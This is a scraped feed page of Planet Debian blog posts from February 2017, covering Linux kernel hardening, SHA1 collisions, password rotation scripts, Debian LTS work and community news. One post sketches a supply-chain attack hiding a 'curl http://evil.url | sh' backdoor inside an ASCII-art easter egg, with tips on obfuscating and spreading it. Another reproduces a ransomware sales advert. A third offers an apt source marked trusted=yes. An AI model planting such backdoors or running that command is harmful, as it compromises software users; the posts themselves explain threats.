Subscribe: Planet Debian
http://planet.debian.org/rss20.xml
Added By: Feedage Forager Feedage Grade B rated
Language: English
Tags:
add  bit  code  data  debian  file  free software  git  make  much  new  package  password  set  software  time   
Rate this Feed
Rate this feedRate this feedRate this feedRate this feedRate this feed
Rate this feed 1 starRate this feed 2 starRate this feed 3 starRate this feed 4 starRate this feed 5 star

Comments (0)

Feed Details and Statistics Feed Statistics
Preview: Planet Debian

Planet Debian



Planet Debian - http://planet.debian.org/



 



Kees Cook: security things in Linux v4.10

Tue, 28 Feb 2017 06:31:42 +0000

Previously: v4.9. Here’s a quick summary of some of the interesting security things in last week’s v4.10 release of the Linux kernel: PAN emulation on arm64 Catalin Marinas introduced ARM64_SW_TTBR0_PAN, which is functionally the arm64 equivalent of arm’s CONFIG_CPU_SW_DOMAIN_PAN. While Privileged eXecute Never (PXN) has been available in ARM hardware for a while now, Privileged Access Never (PAN) will only be available in hardware once vendors start manufacturing ARMv8.1 or later CPUs. Right now, everything is still ARMv8.0, which left a bit of a gap in security flaw mitigations on ARM since CONFIG_CPU_SW_DOMAIN_PAN can only provide PAN coverage on ARMv7 systems, but nothing existed on ARMv8.0. This solves that problem and closes a common exploitation method for arm64 systems. thread_info relocation on arm64 As done earlier for x86, Mark Rutland has moved thread_info off the kernel stack on arm64. With thread_info no longer on the stack, it’s more difficult for attackers to find it, which makes it harder to subvert the very sensitive addr_limit field. linked list hardening I added CONFIG_BUG_ON_DATA_CORRUPTION to restore the original CONFIG_DEBUG_LIST behavior that existed prior to v2.6.27 (9 years ago): if list metadata corruption is detected, the kernel refuses to perform the operation, rather than just WARNing and continuing with the corrupted operation anyway. Since linked list corruption (usually via heap overflows) are a common method for attackers to gain a write-what-where primitive, it’s important to stop the list add/del operation if the metadata is obviously corrupted. seeding kernel RNG from UEFI A problem for many architectures is finding a viable source of early boot entropy to initialize the kernel Random Number Generator. For x86, this is mainly solved with the RDRAND instruction. On ARM, however, the solutions continue to be very vendor-specific. As it turns out, UEFI is supposed to hide various vendor-specific things behind a common set of APIs. The EFI_RNG_PROTOCOL call is designed to provide entropy, but it can’t be called when the kernel is running. To get entropy into the kernel, Ard Biesheuvel created a UEFI config table (LINUX_EFI_RANDOM_SEED_TABLE_GUID) that is populated during the UEFI boot stub and fed into the kernel entropy pool during early boot. arm64 W^X detection As done earlier for x86, Laura Abbott implemented CONFIG_DEBUG_WX on arm64. Now any dangerous arm64 kernel memory protections will be loudly reported at boot time. 64-bit get_user() zeroing fix on arm While the fix itself is pretty minor, I like that this bug was found through a combined improvement to the usercopy test code in lib/test_user_copy.c. Hoeun Ryu added zeroing-on-failure testing, and I expanded the get_user()/put_user() tests to include all sizes. Neither improvement alone would have found the ARM bug, but together they uncovered a typo in a corner case. no-new-privs visible in /proc/$pid/status This is a tiny change, but I like being able to introspect processes externally. Prior to this, I wasn’t able to trivially answer the question “is that process setting the no-new-privs flag?” To address this, I exposed the flag in /proc/$pid/status, as NoNewPrivs. That’s all for now! Please let me know if you saw anything else you think needs to be called out. :) I’m already excited about the v4.11 merge window opening… © 2017, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License. [...]



Gunnar Wolf: Much belated book presentation, this Saturday

Tue, 28 Feb 2017 05:21:51 +0000

(image)

Once again, I'm making an announcement mainly for my local circle of friends and (gasp!) followers. For those of you over 100Km away from Mexico City, please disregard this message.

Back in July 2015, and after two years of hard work, my university finished the publishing step of my second book. This is a textbook for the subject I teach at Computer Engineering: Operating Systems Fundamentals.

The book is, from its inception, fully available online under a permissive (CC-BY) license. One of the books aimed contributions is to present a text natively written in Spanish. Besides, our goal (I coordinated a team of authors, working with two colleagues from Rosario, Argentina, and one from Cauca, Colombia) was to provide a book students can easily and legally share with no legal issues.

I have got many good reviews so far, and after teaching based on it for four years (while working on it and after its publication), I can attest the material is light enough to fit in a Bachelors level degree, while it's deep enough to make our students sweat healthily ;-)

Anyway: I have been scheduled to present the book at my university's main book show, 38 Feria Internacional del Libro del Palacio de Minería this Saturday, 2017.03.04 16:00; Salón Manuel Tolsá. What's even better: This time, I won't be preparing a speech! The book will be presented by my two very good friends, José María Serralde and Rolando Cedillo. Both of them are clever, witty, fun, and a real honor to work with. Of course, having them present our book is more than a double honor.

So, everybody who can make it: FIL Minería is always great and fun. Come share the love! Come have a book! Or, at least, have a good time and a nice chat with us!




Urvika Gola: Outreachy- Week 8 & 9 Progress

Tue, 28 Feb 2017 04:46:59 +0000

(image)

Working with 9-Patch Images, Adapter Classes, Layouts  in Android.

Before starting this new task I never wondered ..”How does that bubble around our chat messages wraps around the width of the text written by us??”.

The image being used as the background of our messages are called 9-Patch images.

They stretch themselves according to the text length and font size!

Android will automatically resize to accommodate the contents , like–

(image)

Source- developer.android.com

How great it would be if the clothes we wear could also work the same way.
Fit according to the body-size. I could then still wear my childhood cute nostalgic dresses..

Below, are the 9-Patch image I edited. There are two set of bubble images which are different for incoming and outgoing SIP messages.

(image)            (image)

 

These images have to be designed a certain way and should be stored as the smallest size and leave 1px to all sides. Details are clearly explained in Android Documentation–

https://developer.android.com/guide/topics/graphics/2d-graphics.html#nine-patch

Then,  save the image by concatenating “.9” between the file name and extension.

For example if your image name is bubble.png.  Rename it to bubble.9.png

They should be stored like any other image file in res/drawable folder.

Using 9-patch images these problems are taken care of–

  1. The image proportions are set according to different screen sizes automatically.
    You don’t have to create multiple PNGs of different pixels for multiple screen sizes.
  2. The image resizes itself accroding to the Text size set in the user’s phone.

I had to modify the existing Lumicall SIP Message screen which had simple ListView as the chat message holder and replace it with 9-patch bubble images to make it more interactive (image)

Voila! What a simple way to provide a simple yet valuable usability feature.

 



(image)



Joey Hess: making git-annex secure in the face of SHA1 collisions

Mon, 27 Feb 2017 21:15:00 +0000

(image)

git-annex has never used SHA1 by default. But, there are concerns about SHA1 collisions being used to exploit git repositories in various ways. Since git-annex builds on top of git, it inherits its foundational SHA1 weaknesses. Or does it?

Interestingly, when I dug into the details, I found a way to make git-annex repositories secure from SHA1 collision attacks, as long as signed commits are used (and verified).

When git commits are signed (and verified), SHA1 collisions in commits are not a problem. And there seems to be no way to generate usefully colliding git tree objects (unless they contain really ugly binary filenames). That leaves blob objects, and when using git-annex, those are git-annex key names, which can be secured from being a vector for SHA1 collision attacks.

This needed some work on git-annex, which is now done, so look for a release in the next day or two that hardens it against SHA1 collision attacks. For details about how to use it, and more about why it avoids git's SHA1 weaknesses, see https://git-annex.branchable.com/tips/using_signed_git_commits/.

My advice is, if you are using a git repository to publish or collaborate on binary files, in which it's easy to hide SHA1 collisions, you should switch to using git-annex and signed commits.

PS: Of course, verifying gpg signatures on signed commits adds some complexity and won't always be done. It turns out that the current SHA1 known-prefix collision attack cannot be usefully used to generate colliding commit objects, although a future common-prefix collision attack might. So, even if users don't verify signed commits, I believe that repositories using git-annex for binary files will be as secure as git repositories containing binary files used to be. How-ever secure that might be..




Matthew Garrett: The Fantasyland Code of Professionalism is an abuser's fantasy

Mon, 27 Feb 2017 01:40:11 +0000

The Fantasyland Institute of Learning is the organisation behind Lambdaconf, a functional programming conference perhaps best known for standing behind a racist they had invited as a speaker. The fallout of that has resulted in them trying to band together events in order to reduce disruption caused by sponsors or speakers declining to be associated with conferences that think inviting racists is more important than the comfort of non-racists, which is weird in all sorts of ways but not what I'm talking about here because they've also written a "Code of Professionalism" which is like a Code of Conduct except it protects abusers rather than minorities and no really it is genuinely as bad as it sounds.The first thing you need to know is that the document uses its own jargon. Important here are the concepts of active and inactive participation - active participation is anything that you do within the community covered by a specific instance of the Code, inactive participation is anything that happens anywhere ever (ie, active participation is a subset of inactive participation). The restrictions based around active participation are broadly those that you'd expect in a very weak code of conduct - it's basically "Don't be mean", but with some quirks. The most significant is that there's a "Don't moralise" provision, which as written means saying "I think people who support slavery are bad" in a community setting is a violation of the code, but the description of discrimination means saying "I volunteer to mentor anybody from a minority background" could also result in any community member not from a minority background complaining that you've discriminated against them. It's just not very good.Inactive participation is where things go badly wrong. If you engage in community or professional sabotage, or if you shame a member based on their behaviour inside the community, that's a violation. Community sabotage isn't defined and so basically allows a community to throw out whoever they want to. Professional sabotage means doing anything that can hurt a member's professional career. Shaming is saying anything negative about a member to a non-member if that information was obtained from within the community.So, what does that mean? Here are some things that you are forbidden from doing:If a member says something racist at a conference, you are not permitted to tell anyone who is not a community member that this happened (shaming)If a member tries to assault you, you are not allowed to tell the police (shaming)If a member gives a horribly racist speech at another conference, you are not allowed to suggest that they shouldn't be allowed to speak at your event (professional sabotage)If a member of your community reports a violation and no action is taken, you are not allowed to warn other people outside the community that this is considered acceptable behaviour (community sabotage)Now, clearly, some of these are unintentional - I don't think the authors of this policy would want to defend the idea that you can't report something to the police, and I'm sure they'd be willing to modify the document to permit this. But it's indicative of the mindset behind it. This policy has been written to protect people who are accused of doing something bad, not to protect people who have something bad done to them.There are other examples of this. For instance, violations are not publicised unless the verdict is that they deserve banishment. If a member harasses another member but is merely given a warning, the victim is still not permitted to tell anyone else that this happened. The perpetrator is then free to repeat their behaviour in other communities, and the victim has to choose between either staying silent or warning them and risk being banished from the community for shaming.If you're an abuser then this is perfect. You're in a position where your victims have to choose between their career (which will be harmed if they're unab[...]



Steinar H. Gunderson: 10-bit H.264 tests

Mon, 27 Feb 2017 00:02:00 +0000

Following the post about 10-bit Y'CbCr earlier this week, I thought I'd make an actual test of 10-bit H.264 compression for live streaming. The basic question is; sure, it's better-per-bit, but it's also slower, so it is better-per-MHz? This is largely inspired by Ronald Bultje's post about streaming performance, where he largely showed that HEVC is currently useless for live streaming from software; unless you can encode at x264's “veryslow” preset (which, at 720p60, means basically rather simple content and 20 cores or so), the best x265 presets you can afford will give you worse quality than the best x264 presets you can afford. My results will maybe not be as scientific, but hopefully still enlightening. I used the same test clip as Ronald, namely a two-minute clip of Tears of Steel. Note that this is an 8-bit input, so we're not testing the effects of 10-bit input; it's just testing the increased internal precision in the codec. Since my focus is practical streaming, I ran the last version of x264 at four threads (a typical desktop machine), using one-pass encoding at 4000 kbit/sec. Nageru's speed control has 26 presets to choose from, which gives pretty smooth steps between neighboring ones, but I've been sticking to the ten standard x264 presets (ultrafast, superfast, veryfast, faster, fast, medium, slow, slower, veryslow, placebo). Here's the graph: The x-axis is seconds used for the encode (note the logarithmic scale; placebo takes 200–250 times as long as ultrafast). The y-axis is SSIM dB, so up and to the left is better. The blue line is 8-bit, and the red line is 10-bit. (I ran most encodes five times and averaged the results, but it doesn't really matter, due to the logarithmic scale.) The results are actually much stronger than I assumed; if you run on (8-bit) ultrafast or superfast, you should stay with 8-bit, but from there on, 10-bit is on the Pareto frontier. Actually, 10-bit veryfast (18.187 dB) is better than 8-bit medium (18.111 dB), while being four times as fast! But not all of us have a relation to dB quality, so I chose to also do a test that maybe is a bit more intuitive, centered around bitrate needed for constant quality. I locked quality to 18 dBm, ie., for each preset, I adjusted the bitrate until the SSIM showed 18.000 dB plus/minus 0.001 dB. (Note that this means faster presets get less of a speed advantage, because they need higher bitrate, which means more time spent entropy coding.) Then I measured the encoding time (again five times) and graphed the results: x-axis is again seconds, and y-axis is bitrate needed in kbit/sec, so lower and to the left is better. Blue is again 8-bit and red is again 10-bit. If the previous graph was enough to make me intrigued, this is enough to make me excited. In general, 10-bit gives 20-30% lower bitrate for the same quality and CPU usage! (Compare this with the supposed “up to 50%“ benefits of HEVC over H.264, given infinite CPU usage.) The most dramatic example is when comparing the “medium” presets directly, where 10-bit runs at 2648 kbit/sec versus 3715 kbit/sec (29% lower bitrate!) and is only 5% slower. As one progresses towards the slower presets, the gap is somewhat narrowed (placebo is 27% slower and “only” 24% lower bitrate), but in the realistic middle range, the difference is quite marked. If you run 3 Mbit/sec at 10-bit, you get the quality of 4 Mbit/sec at 8-bit. So is 10-bit H.264 a no-brainer? Unfortunately, no; the client hardware support is nearly nil. Not even Skylake, which can do 10-bit HEVC encoding in hardware (and 10-bit VP9 decoding), can do 10-bit H.264 decoding in hardware. Worse still, mobile chipsets generally don't support it. There are rumors that iPhone 6s supports it, but these are unconfirmed; some Android chips support it, but most don't. I guess this explains a lot of the limited uptake; since it's in some ways a new codec, implementers are more keen[...]



Jonas Meurer: debian lts report 2017.02

Sat, 25 Feb 2017 17:22:01 +0000

Debian LTS report for February 2017

February 2017 was my sixth month as a Debian LTS team member. I was allocated 5 hours and had 9,75 hours left over from January 2017. This makes a total of 14,75 hours. I spent all of them doing the following:

  • DLA 831-1: Fix buffer overflows in gtk-vnc
  • Reviewed the apache2 2.2.22-13+deb7u8 upload, improved the patches
  • Reviewed CVE-2017-5666 (mp3splt)
  • DLA 836-1: Fix command injection vulnerability in munin cgi script



Stefano Zacchiroli: Software Freedom Conservancy matching

Sat, 25 Feb 2017 15:15:10 +0000

become a Conservancy supporter by February 28th and have your donation matched

Non-profits that provide project support have proven themselves to be necessary for the success and advancement of individual projects and Free Software as a whole. The Free Software Foundation (founded in 1985) serves as a home to GNU projects and a canonical list of Free Software licenses. The Open Source Initiative came about in 1998, maintaining the Open Source Definition, based on the Debian Free Software Guidelines, with affiliate members including Debian, Mozilla, and the Wikimedia Foundation. Software in the Public Interest (SPI) was created in the late 90s largely to act as a fiscal sponsor for projects like Debian, enabling it to do things like accept donations and handle other financial transactions.

More recently (2006), the Software Freedom Conservancy was formed. Among other activities—like serving as a fiscal sponsor, infrastructure provider, and support organization for a number of free software projects including Git, Outreachy, and the Debian Copyright Aggregation Project—they protect user freedom via copyleft compliance and GPL enforcement work. Without a willingness to act when licenses are violated, copyleft has no power. Through communication, collaboration, and—only as last resort—litigation, the Conservancy helps everyone who uses a freedom respecting license.

The Conservancy has been aggressively fundraising in order to not just continue its current operations, but expand their work, staff, and efforts. They recently launched a donation matching campaign thanks to the generosity and dedication of an anonymous donor. Everyone who joins the Conservancy as a annual Supporter by February 28th will have their donation matched.

A number of us are already supporters, and hope you will join us in supporting the world of an organization that supports us.




Martin Pitt: systemd 233 about to be released, please help testing

Sat, 25 Feb 2017 12:41:42 +0000

(image)

systemd 233 is scheduled to be released next week, and there is only a handful of small issues left. As usual there are tons of improvements and fixes, but the most intrusive one probably is another attempt to move from legacy cgroup v1 to a “hybrid” setup where the new unified (cgroup v2) hierarchy is mounted at /sys/fs/cgroup/unified/ and the legacy one stays at /sys/fs/cgroup/ as usual. This should provide an easier path for software like Docker or LXC to migrate to the unified hiearchy, but even that hybrid mode broke some bits.

While systemd 233 will not make it into Debian stretch or Ubuntu zesty, as both are in feature freeze, it will soon be available in Debian experimental, and in the next Ubuntu release after 17.04 gets released. Thus now is another good time to give this some thorough testing!

To help with this, please give the PPA with builds from upstream master a spin. In addition to the usual packages for Ubuntu 16.10 I also uploaded a build for Ubuntu zesty, and a build for Debian stretch (aka testing) which also works on Debian sid. You can use that URL as an apt source:

deb [trusted=yes] https://people.debian.org/~mpitt/tmp/systemd-master-20170225/ /

These packages pass our autopkgtests and I tested them manually too. LXC and LXD work fine, docker.io/runc needs a fix which I uploaded to Ubuntu zesty. (It’s not yet available in Debian, sorry.)

Please file reports about regressions on GitHub, but please also le me know about successes on my Google+ page so that we can get some idea about how many people tested this.

Thank you, and happy booting!




Gunnar Wolf: Started getting ads for ransomware. Coincidence?

Fri, 24 Feb 2017 19:06:41 +0000

(image)

Very strange. Verrrry strange.

Yesterday I wrote a blog post on spam stuff that has been hitting my mailbox. Nothing too deep, just me scratching my head.

Coincidentally (I guess/hope), I have been getting messages via my Bitlbee to one of my Jabber accounts, offering me ransomware services. I am reproducing it here, omitting of course everything I can recognize as their brand names related URLs (as I'm not going to promote the 3vi1-doers). I'm reproducing this whole as I'm sure the information will be interesting for some.

*BRAND* Ransomware - The Most Advanced and Customisable you've Ever Seen
Conquer your Independence with *BRAND* Ransomware Full Lifetime License!
* UNIQUE FEATURES
* NO DEPENDENCIES (.net or whatever)!!!
* Edit file Icon and UAC - Works on All Windows Versions
* Set Folders and Extensions to Encrypt, Deadline and Russian Roulette
* Edit the Text, speak with voice (multilang) and Colors for Ransom Window
* Enable/disable USB infect, network spread & file melt
* Set Process Name, sleep time, update ransom amount, Give mercy button
* Full-featured headquarter (for Windows) with unlimited builds, PDF reports, charts and maps, totally autonomous operation
* PHP Bridges instead of expensive C&C servers!
* Automatic Bitcoin payment detection (impossible to bypass/crack - we challege who says the contrary to prove what they say!)
* Totally/Mathematically IMPOSSIBLE to DECRYPT! Period.
* Award-Winning Five-Stars support and constant updates!
* We Have lot vouchs in *BRAND* Market, can check!
Watch the promo video: *URL*
Screenshots: *URL*
Website: *URL*
Price: $389
Promo: just $309 - 20% OFF! until 25th Feb 2017
Jabber: *JID*

I think I can comment on this with my students. Hopefully, this is interesting to others.
Now... I had never received Jabber-spam before. This message has been sent to me 14 times in the last 24 hours (all from different JIDs, all unknown to me). I hope this does not last forever :-/ Otherwise, I will have to learn more on how to configure Bitlbee to ignore contacts not known to me. Grrr...




Jonathan Dowland: OpenShift Java S2I

Fri, 24 Feb 2017 15:21:34 +0000

(image)

One of the products I have done some work on at Red Hat has recently been released to customers and there have been a few things written about it:




Ritesh Raj Sarraf: Shivratri

Fri, 24 Feb 2017 14:43:12 +0000

(image)

जीवन का सत्य, शमशान।

शिव का है स्थान।

 

काली का तांडव नृत्य।

शिव का करे अभिनन्दन।

​​​​​

 

 

 

 

 

 

 

 

Categories: 

Keywords: 

Like: 




Sven Hoexter: Tcl and https - back to TclCurl

Fri, 24 Feb 2017 12:04:28 +0000

Must be the irony of life that I was about to give up the TclCurl Debian package some time ago, and now I'm using it again for some very old and horrible web scraping code.

The world moved on to https but the Tcl http package only supports unencrypted http. You can combine it with the tls package as explained in the Wiki, but that seems to be overly complicated compared to just loading the TclCurl binding and moving on with something like this:

package require TclCurl
# download to a variable
curl::transfer -url https://sven.stormbind.net -bodyvar page
# or store it in a file
curl::transfer -url https://sven.stormbind.net -file page.html

Now the remaining problem is that the code is unmaintained upstream and there is one codebase on bitbucket and one on github. While I fed patches to the bitbucket repo and thus based the Debian package on that repo, the github repo diverted in a different direction.




Joey Hess: SHA1 collision via ASCII art

Fri, 24 Feb 2017 01:06:22 +0000

Happy SHA1 collision day everybody! If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files. The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this: /* ASCII art for easter egg. */ char *amazing_ascii_art="\ (To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.) Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks. The "good" data chunk might then look like this: 7*yLN#!NOKj@{FPKW".6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ And the "bad" data chunk like this: 9xiV^Ksn=w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is. Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above: 7*yLN#!NOK 3*\LN'\NO@ 3*/LN \.A 5*\LN \. >=======:) 5*\7N /. 3*/7N /.V 3*\7N'/NO@ 7*y7N#!NOX Now, take your ASCII art and embed it in a multiline quote in a C source file, like this: /* ASCII art for easter egg. */ char *amazing_ascii_art="\ 7*yLN#!NOK \ 3*\\LN'\\NO@ \ 3*/LN \\.A \ 5*\\LN \\. \ >=======:) \ 5*\\7N /. \ 3*/7N /.V \ 3*\\7N'/NO@ \ 7*y7N#!NOX"; /* We had to escape backslashes above to make it a valid C string. * Run program with --easter-egg to see it in all its glory. */ /* Call this at the top of main() */ check_display_easter_egg (char **argv) { if (strcmp(argv[1], "--easter-egg") == 0) printf(amazing_ascii_art); if (amazing_ascii_art[0] == "9") system("curl http://evil.url | sh"); } Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.) After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs. Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them). Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing t[...]



Stig Sandbeck Mathisen: Change all the passwords (again)

Thu, 23 Feb 2017 23:00:00 +0000

Looks like it is time to change all the passwords again. There’s a tiny little flaw in a CDN used … everywhere, it seems.

Here’s a quick hack for users of the “pass” password manager to qickly find the domains affected. It is not perfect, but it is fast. :)

#!/bin/bash

# Stig Sandbeck Mathisen 

# Checks the content of "pass" against the list of sites using cloudflare.
# Expect false positives, and possibly false negatives.

# TODO: remove the left part of each hostname from pass, to check domains.

set -euo pipefail

tempdir=$(mktemp -d)
trap 'echo >&2 "removing ${tempdir}" ; rm -rf "$tempdir"' EXIT

git clone https://github.com/pirate/sites-using-cloudflare.git "$tempdir"

grep -F -x -f \
  <(pass git ls-files  | sed -e s,/,\ ,g -e s/.gpg// | xargs -n 1 | sort -u) \
  "${tempdir}/sorted_unique_cf.txt" \
  | sort -u

Update: The previous example used parallel. Actually, I didn’t need that. Turns out, using grep correctly is much faster than using grep the wrong way. Lession: Read the manual. :)




Steinar H. Gunderson: Fyrrom recording released

Thu, 23 Feb 2017 22:28:00 +0000

(image)

The recording of yesterday's Fyrrom (Samfundet's unofficial take on Boiler Room) is now available on YouTube. Five video inputs, four hours, two DJs, no dropped frames. Good times.

Soundcloud coming soon!




Steve Kemp: Rotating passwords

Thu, 23 Feb 2017 22:00:00 +0000

(image)

Like many people I use a password-manage to record logins to websites. I previously used a tool called pwsafe, but these days I switched to using pass.

Although I don't like the fact the meta-data is exposed the tool is very useful, and its integration with git is both simple and reliable.

Reading about the security issue that recently affected cloudflare made me consider rotating some passwords. Using git I figured I could look at the last update-time of my passwords. Indeed that was pretty simple:

git ls-tree -r --name-only HEAD | while read filename; do
  echo "$(git log -1 --format="%ad" -- $filename) $filename"
done

Of course that's not quite enough because we want it sorted, and to do that using the seconds-since-epoch is neater. All together I wrote this:

#!/bin/sh
#
# Show password age - should be useful for rotation - we first of all
# format the timestamp of every *.gpg file, as both unix+relative time,
# then we sort, and finally we output that sorted data - but we skip
# the first field which is the unix-epoch time.
#
( git ls-tree -r --name-only HEAD | grep '\.gpg$' | while read filename; do \
      echo "$(git log -1 --format="%at %ar" -- $filename) $filename" ; done ) \
        | sort | awk '{for (i=2; i

Not the cleanest script I've ever hacked together, but the output is nice:

 steve@ssh ~ $ cd ~/Repos/personal/pass/
 steve@ssh ~/Repos/personal/pass $ ./password-age | head -n 5
 1 year, 10 months ago GPG/root@localhost.gpg
 1 year, 10 months ago GPG/steve@steve.org.uk.OLD.gpg
 1 year, 10 months ago GPG/steve@steve.org.uk.NEW.gpg
 1 year, 10 months ago Git/git.steve.org.uk/root.gpg
 1 year, 10 months ago Git/git.steve.org.uk/skx.gpg

Now I need to pick the sites that are more than a year old and rotate credentials. Or delete accounts, as appropriate.




Joerg Jaspert: Automated wifi login

Thu, 23 Feb 2017 20:32:42 +0000

If you have the fortune to need to follow some silly “Login” button for some wifi, regularly, the following little script may help you avoid this idiotic (and useless) task.

This example uses the WIFIonICE, the free wifi on german ICE trains, simply as I have it twice a day, and got annoyed by the pointless Login button. A friend pointed me at just wget-ting the login page, so I made Network-Manager do this for me. Should work for anything similar that doesn’t need some elaborate webform filled out.

#!/bin/bash

# (Some) docs at
# https://wiki.ubuntuusers.de/NetworkManager/Dispatcher/

IFACE=${1:-"none"}
ACTION=${2:-"up"}

case ${ACTION} in
    up)
        CONID=${CONNECTION_ID:-$(iwconfig $IFACE | grep ESSID | cut -d":" -f2 | sed 's/^[^"]*"\|"[^"]*$//g')}
        if [[ ${CONID} == WIFIonICE ]]; then
            /usr/bin/timeout -k 20 15 /usr/bin/wget -q -O - http://www.wifionice.de/?login > /dev/null
        fi
        ;;
    *)
        # We are not interested in this
        :
        ;;
esac

This script needs to be put into /etc/NetworkManager/dispatcher.d and made executable, owned by the root user. It will run on every connection change, thats why the ACTION is checked. The case may be a bit much here, but it could be easily extended to do a lot more.

Yay, no more silly “Open this webpage and press login” crap.




Lucas Nussbaum: Implementing “right to disconnect” by delaying outgoing email?

Thu, 23 Feb 2017 07:26:20 +0000

(image)

France passed a law about “right to disconnect” (more info here or here). The idea of not sending professional emails when people are not supposed to read them in order to protect their private lifes, is a pretty good one, especially when hierarchy is involved. However, I tend to do email at random times, and I would rather continue doing that, but just delay the actual sending of the email to the appropriate time (e.g., when I do email in the evening, it would actually be sent the following morning at 9am).

I wonder how I could make this fit into my email workflow. I write email using mutt on my laptop, then push it locally to nullmailer, that then relays it,  over an SSH tunnel, to a remote server (running Exim4).

Of course the fallback solution would be to use mutt’s postponing feature. Or to draft the email in a text editor. But that’s not really nice, because it requires going back to the email at the appropriate time. I would like a solution where I would write the email, add a header (or maybe manually add a Date: header — in all cases that header should reflect the time the mail was sent, not the time it was written), send the email, and have nullmailer or the remote server queue it until the appropriate time is reached (e.g., delaying while “current_time < Date header in email”). I don’t want to do that for all emails: e.g. personal emails can go out immediately.

Any ideas on how to implement that? I’m attached to mutt and relaying using SSH, but not attached to nullmailer or exim4. Ideally the delaying would happen on my remote server, so that my laptop doesn’t need to be online at the appropriate time.

Update: mutt does not allow to set the Date: field manually (if you enable the edit_headers option and edit it manually, its value gets overwritten). I did not find the relevant code yet, but that behaviour is mentioned in that bug.

Update 2: ah, it’s this code in sendlib.c (and there’s no way to configure that behaviour):

 /* mutt_write_rfc822_header() only writes out a Date: header with
 * mode == 0, i.e. _not_ postponment; so write out one ourself */
 if (post)
   fprintf (msg->fp, "%s", mutt_make_date (buf, sizeof (buf)));



Gunnar Wolf: Spam: Tactics, strategy, and angry bears

Thu, 23 Feb 2017 05:55:57 +0000

(image)

I know spam is spam is spam, and I know trying to figure out any logic underneath it is a lost cause. However... I am curious.

Many spam subjects are seemingly random, designed to convey whatever "information" they contain and fool spam filters. I understand that.

Many spam subjects are time-related. As an example, in the last months there has been a surge of spam mentioning Donald Trump. I am thankful: Very easy to filter out, even before it reaches spamassassin.

Of course, spam will find thousands of ways to talk about sex; cialis/viagra sellers, escort services, and a long list of WTF.

However... Tactical flashlights. Bright enough to blind a bear.

WTF‽‽‽

I mean... Truly. Really. WTF‽‽

What does that mean? Why is that even a topic? Who is interested in anything like that? How often does the average person go camping in the woods? Why do we need to worry about stupid bears attacking us? Why would a bear attack me?

The list of WTF questions could go on forever. What am I missing? What does "tactical flashlight" mean that I just fail to grasp? Has this appeared in your spam?




Neil McGovern: A new journey – GNOME Foundation Executive Director

Wed, 22 Feb 2017 16:50:06 +0000

(image)

(image) For those who haven’t heard, I’ve been appointed as the new Executive Director of the GNOME Foundation, and I started last week on the 15th February.

It’s been an interesting week so far, mainly meeting lots of people and trying to get up to speed with what looks like an enormous job! However, I’m thoroughly excited by the opportunity and am very grateful for everyone’s warm words of welcome so far.

One of the main things I’m here to do is to try and help. GNOME is strong because of its community. It’s because of all of you that GNOME can produce world leading technologies and a desktop that is intuitive, clean and functional. So, if you’re stuck with something, or if there’s a way that either myself or the Foundation can help, then please speak up!

Additionally, I intend on making this blog a much more frequently updated one – letting people know what I’m doing, and highlighting cool things that are happening around the project. In that vein, this week I’ve also started contacting all our fantastic Advisory Board members. I’m also looking at finding sponsors for GUADEC and GNOME.Asia, so if you know of anyone, let me know! I also booked my travel to the GTK+ hackfest and to LibrePlanet – if you’re going to either of those, make sure you come and introduce yourself :)

Finally, a small advertisement for Friends of GNOME. Your generosity really does help the Foundation support development of GNOME. Join up today!




Lisandro Damián Nicanor Pérez Meyer: Developing an nrf51822 based embedded device with Qt Creator and Debian

Wed, 22 Feb 2017 13:18:00 +0000

(image) I'm currently developing an nRF51822-based embedded device. Being one the Qt/Qt Creator maintainers in Debian I would of course try to use it for the development. Turns out it works pretty good... with some caveats.

There are already two quite interesting blog posts about using Qt Creator on MAC and on Windows, so I will not repeat the basics, as they are there. Both use qbs, but I managed to use CMake.

Instead I'll add some tips on the stuff that I needed to solve in order to make this happen on current Debian Sid.


  • The required toolchain is already in Debian, just install binutils-arm-none-eabi, gcc-arm-none-eabi and gdb-arm-none-eabi.
  • You will not find arm-none-eabi-gdb-py on the gdb-arm-none-eabi package. Fear not, the provided gdb binary is compiled against python so it will work.
  • To enable proper debugging be sure to follow this flag setup. If you are using CMake like in this example be sure to modify CMake/toolchain_gcc.cmake as necessary.
  • In Qt Creator you might find that, while try to run or debug your app, you are greated with a message box that says "Cannot debug: Local executable is not set." Just go to Projects →Run and change "Run configuration" until you get a valid path (ie, a path to the .elf or .out file) in the "Executable" field.

Cheers!



Enrico Zini: staticsite news: github mode and post series

Wed, 22 Feb 2017 13:10:58 +0000

GitHub mode

Tobias Gruetzmacher implemented GitHub mode for staticsite.

Although GitHub now has a similar site rendering mode, it doesn't give you a live preview: if you run ssite serve on a GitHub project you will get a live preview of README.md and the project documentation.

Post series

I have added support for post series, that allow you to easily interlink posts with previous/next links.

You can see it in action on links and on An Italian song a day, an ongoing series that is currently each day posting a link to an Italian song.




Jonathan Dowland: Hans Rosling and Steve Hewlett

Wed, 22 Feb 2017 11:13:15 +0000

(image)

